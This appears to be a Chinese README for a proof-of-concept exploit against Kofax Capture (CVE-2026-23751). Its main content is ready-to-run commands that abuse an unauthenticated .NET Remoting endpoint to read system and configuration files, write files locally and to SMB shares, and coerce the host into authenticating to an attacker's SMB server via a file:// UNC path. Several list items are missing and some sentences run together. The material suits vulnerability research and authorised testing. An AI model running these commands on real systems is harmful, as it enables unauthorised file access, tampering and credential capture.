对 Code White 的 NewRemotingTricks 中所述技术的概念验证重新实现,针对 Tungsten Automation Kofax Capture。
标题: Tungsten Automation - Kofax Capture 通过 .NET HTTP Remoting 实现未认证文件读取/写入及 SMB 强制认证
CVE: CVE-2026-23751
CVE-2026-23751 影响 Tungsten Automation Kofax Capture,允许未认证的远程攻击者与 Kofax Capture ACService 暴露的 .NET HTTP Remoting 端点进行交互。
该漏洞可被利用来执行:
该 PoC 重新实现了 Code White 的 NewRemotingTricks 项目中相关的 .NET Remoting 技术。
该 PoC 针对 Kofax Capture ACService HTTP Remoting 端点:
http://<target>:2424/ACService
端口 2424 是受影响服务使用的默认 HTTP Remoting 端口。
以下示例从目标读取 Windows hosts 文件:
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService C:\Windows\System32\drivers\etc\hosts
同样可以读取 Kofax Capture 配置文件:
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService C:\ProgramData\Kofax\Remoting\Client\Configuration\ConfigInfo.xml
通过提供目标路径及内容,可以将文件写入 Kofax Capture 服务可访问的位置:
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService C:\Windows\Temp\test.txt HelloWorld
同样的功能可以与 UNC 路径一起使用,以写入远程 SMB 共享:
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService \\<remote_host>\share\file.txt HelloWorld
访问远程资源的能力取决于 Kofax Capture 服务的权限和安全上下文。
可以提供 file:// URI 以导致目标访问远程 SMB 资源:
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService file://\\<attacker>\file\file.txt
根据目标环境及其安全配置,这可能导致受影响主机向攻击者控制的 SMB 服务器进行认证。
该漏洞涉及 Kofax Capture 的 ACService 使用 .NET HTTP Remoting。
.NET Remoting 支持各种 URI 方案和对象序列化机制。通过以特定方式与暴露的 remoting 端点交互,未认证客户端可以导致服务使用客户端提供的路径执行文件系统操作。
该 PoC 演示了如何利用此行为来:
file:// 资源的访问该 PoC 目前演示了将字符串数据写入文件。通过相应修改源代码,可以支持其他文件类型和负载格式。
此实现基于以下研究中提出的技术和成果:
Code White - NewRemotingTricks
ACService 的网络RemotingClient_MBRO_Lazy.exe利用该漏洞无需对 Kofax Capture 服务进行认证。
本仓库仅用于安全研究、漏洞验证和授权渗透测试目的。
未经明确授权,请勿将此 PoC 用于任何系统。作者不对因滥用本软件而导致的损害、数据丢失、未经授权的访问或其他后果负责。